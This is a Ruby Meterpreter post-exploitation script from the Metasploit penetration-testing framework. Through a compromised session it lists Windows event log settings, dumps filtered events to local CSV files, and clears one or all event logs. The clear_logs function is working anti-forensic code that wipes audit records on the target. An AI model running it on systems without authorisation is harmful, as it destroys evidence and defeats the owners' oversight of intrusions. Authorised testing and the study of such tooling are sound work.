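##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
# Meterpreter script to enumerate (-i), dump (-l/-f/-s/-p) and clear (-c)
# Windows Event Logs through an existing session.
#
# Everything read from the target (hostname, registry values, event strings)
# is attacker-controlled from the operator's point of view and is treated as
# untrusted: the hostname is sanitised before it becomes a local directory name
# and event strings are quoted before they are written to CSV.
#
################## Variable Declarations ##################
@client = client
eventlog_name = nil
print_logs = false
do_list = false
do_clear = false
local_log = false
local_log_path = nil
suppress_print = false
filter = '\d*'        # regexp source matched against each EventID (anchored in list_logs)
filter_string = "*"   # kept for list_logs' signature; not used by the filter
meter_type = client.platform
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu" ],
  "-i" => [ false, "Show information about Event Logs on the System and their configuration"],
  "-l" => [ true, "List a given Event Log."],
  "-c" => [ true, "Clear a given Event Log (or ALL if no argument specified)"],
  "-f" => [ true, "Event ID to filter events on"],
  "-s" => [ true, "Save logs to local CSV file, optionally specify alternate folder in which to save logs"],
  "-p" => [ false, "Suppress printing filtered logs to screen"]
)


################## Function Declarations ##################

# Usage Message Function
#-------------------------------------------------------------------------------
# Prints the option summary and terminates the script.
def usage(opts)
  print_line "Meterpreter Script for Windows Event Log Query and Clear."
  print_line(opts.usage)
  raise Rex::Script::Completed
end

# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
# Reports an unsupported Meterpreter platform and terminates the script.
# The default is read from the session: a script-level local (the original
# used meter_type) is not visible inside a method body.
def wrong_meter_version(meter = @client.platform)
  print_error("#{meter} version of Meterpreter is not supported with this script!")
  raise Rex::Script::Completed
end

# Function for Enumerating EventLogs
#-------------------------------------------------------------------------------
# Returns an Array of Hashes, one per log returned by eventlog_list, with keys
# :name, :retention ("Enabled"/"Disabled"), :size (the MaxSize registry value,
# as stored) and :num_of_records (record count, or "Access Denied" when the
# registry key or the log itself cannot be read).
def get_log_details
  # Older systems spell the service key "Eventlog"; newer ones use "eventlog".
  # Hoisted out of the loop: sysinfo is a round trip to the target.
  key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
  if @client.sys.config.sysinfo['OS'] =~ /Windows 2003|.Net|XP|2000/
    key = "#{key}Eventlog"
  else
    key = "#{key}eventlog"
  end

  eventlog_list.map do |log_name|
    log_detail = {
      :name           => log_name,
      :retention      => "Disabled",
      :size           => 0,
      :num_of_records => 0,   # the original defaulted :number_of_records, a key nothing read
    }

    begin
      # A non-zero Retention value means the log retains events instead of
      # overwriting them as needed. The original assigned "Disabled" in both
      # branches, so retention was never actually reported.
      retention = registry_getvaldata("#{key}\\#{log_name}", "Retention")
      log_detail[:retention] = "Enabled" unless retention.nil? || retention == 0
      log_detail[:size] = registry_getvaldata("#{key}\\#{log_name}", "MaxSize")

      # Opening the log is what fails when the session lacks the privilege to
      # read it (e.g. Security); that is reported rather than raised.
      eventlog = @client.sys.eventlog.open(log_name)
      log_detail[:num_of_records] = eventlog.length
    rescue
      log_detail[:num_of_records] = "Access Denied"
    end

    log_detail
  end
end


# Function for Printing Event Log Details
#-------------------------------------------------------------------------------
# Prints a table of every event log with its retention setting, maximum size
# and record count.
def print_log_details
  print_status("Retrieving Event Log Configuration")
  tbl = Rex::Text::Table.new(
    'Header'  => "Event Logs on System",
    'Indent'  => 1,
    'Columns' => [ "Name", "Retention", "Maximum Size", "Records" ]
  )

  get_log_details.each do |log_detail|
    # MaxSize is stored in bytes in the registry; convert to KB so the "K"
    # suffix is accurate. Anything that is not an Integer is shown unchanged.
    size = log_detail[:size]
    size_kb = size.is_a?(Integer) ? "#{size / 1024}K" : "#{size}K"
    tbl << [ log_detail[:name], log_detail[:retention], size_kb, log_detail[:num_of_records] ]
  end

  print_line("\n" + tbl.to_s + "\n")
end


# Function for doings queries of EventLogs
#-------------------------------------------------------------------------------
# Walks eventlog_name newest-first, prints every event whose EventID matches
# filter (a regexp given as a String, anchored so "-f 1" matches only ID 1 and
# not 10, 100, ...) and, when local_log is true, writes the matching events to
# "<logs>/<eventlog_name>.csv".
#
# filter_string is accepted for compatibility with the existing call site but
# is not used. sup_print only suppresses console output: the CSV is filled in
# either way.
def list_logs(eventlog_name, filter, filter_string, logs, local_log, sup_print)
  begin
    id_regex = Regexp.new("\\A(?:#{filter})\\z")
  rescue RegexpError => e
    print_error("Invalid Event ID filter '#{filter}': #{e.message}")
    raise Rex::Script::Completed
  end

  csv_data = "EventID,Date,Data\n"
  begin
    log = @client.sys.eventlog.open(eventlog_name)
    log.each_backwards do |e|
      next unless e.eventid.to_s =~ id_regex

      # Event strings come from the target and may carry embedded CRLFs.
      lines = e.strings.flat_map { |s| s.split("\r\n") }.map(&:chomp)

      unless sup_print
        print_status("EventID: #{e.eventid}")
        print_status("Date: #{e.generated}")
        print_status("Data:")
        lines.each { |ml| print_status("\t#{ml}") }
        print_status
      end

      # Build the Data cell regardless of sup_print (the original only
      # collected it while printing, so -s together with -p produced empty
      # cells). Double every quote so target-supplied text cannot break out
      # of the quoted field. Nothing else is neutralised: a value beginning
      # with = + - or @ is evaluated as a formula by spreadsheet software, so
      # treat the resulting file as untrusted input.
      event_data = lines.map { |ml| " #{ml}" }.join.gsub('"', '""')
      csv_data << "#{e.eventid},#{e.generated},\"#{event_data}\"\n"
    end
  rescue
    print_error("Failed to Open Event Log #{eventlog_name}")
    raise Rex::Script::Completed
  end

  if local_log
    log_file = File.join(logs, "#{eventlog_name}.csv")
    file_local_write(log_file, csv_data)
    print_good("CSV File saved to #{log_file}")
  end
end

# Function for clearing EventLogs
#-------------------------------------------------------------------------------
# Clears the named event log, or every log from eventlog_list when log_name is
# nil. A failure on one log (typically insufficient privilege) is reported and
# the remaining logs are still processed. Returns the Array of names attempted.
def clear_logs(log_name = nil)
  log_names = log_name.nil? ? eventlog_list : [log_name]

  log_names.each do |name|
    begin
      print_status("Clearing #{name}")
      @client.sys.eventlog.open(name).clear
      print_status("Event Log #{name} Cleared!")
    rescue
      print_error("Failed to Clear #{name}, Access Denied")
    end
  end

  log_names
end

################## Main ##################
opts.parse(args) { |opt, _idx, val|
  case opt
  when "-h"
    usage(opts)
  when "-i"
    # Deferred until after the platform check below, so -i on a non-Windows
    # session gets the "not supported" message instead of a registry error.
    print_logs = true
  when "-c"
    do_clear = true
    eventlog_name = val
  when "-l"
    do_list = true
    eventlog_name = val
  when "-f"
    filter = val
  when "-s"
    local_log = true
    # The folder is optional (see the help text); only validate one that was
    # given, instead of passing nil to File.directory? and raising TypeError.
    unless val.nil?
      if File.directory?(val)
        local_log_path = val
      else
        print_error("Log folder #{val} does not exist!")
        raise Rex::Script::Completed
      end
    end
  when "-p"
    suppress_print = true
  end
}

# Check for Version of Meterpreter
wrong_meter_version(meter_type) if meter_type != 'windows'

if print_logs
  print_log_details
  raise Rex::Script::Completed
end

# Print usage & exit if the user didn't specify an action
usage(opts) if !do_list && !do_clear

# Log Folder Creation
#-----------------------------------------------------------------------
# Create a directory for any local logging if the user desires
logs = nil
if local_log
  # The hostname is supplied by the target: Rex::FileUtils.clean_path sanitises
  # it before it becomes part of a local directory name. Keep that call.
  host = @client.sys.config.sysinfo["Computer"]
  # Include the hour: the original "%Y%m%d.%M%S" omitted it, so runs in
  # different hours with the same minute/second landed in the same folder.
  filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")
  base = local_log_path || ::File.join(Msf::Config.log_directory, "scripts", 'event_manager')
  logs = ::File.join(base, Rex::FileUtils.clean_path(host + filenameinfo))
  ::FileUtils.mkdir_p(logs)
end

# List the logs if the user desires. The original complained about a missing
# log name even when only -c was given; only complain when -l was requested.
if do_list
  if eventlog_name
    list_logs(eventlog_name, filter, filter_string, logs, local_log, suppress_print)
  else
    print_error("You must specify an eventlog to query!")
  end
end

# Finally, clear the specified logs if the user desires (nil clears ALL).
# NOTE(review): clearing is a loud action on the target; expect the system's
# own auditing to record that a log was cleared.
if do_clear
  clear_logs(eventlog_name)
end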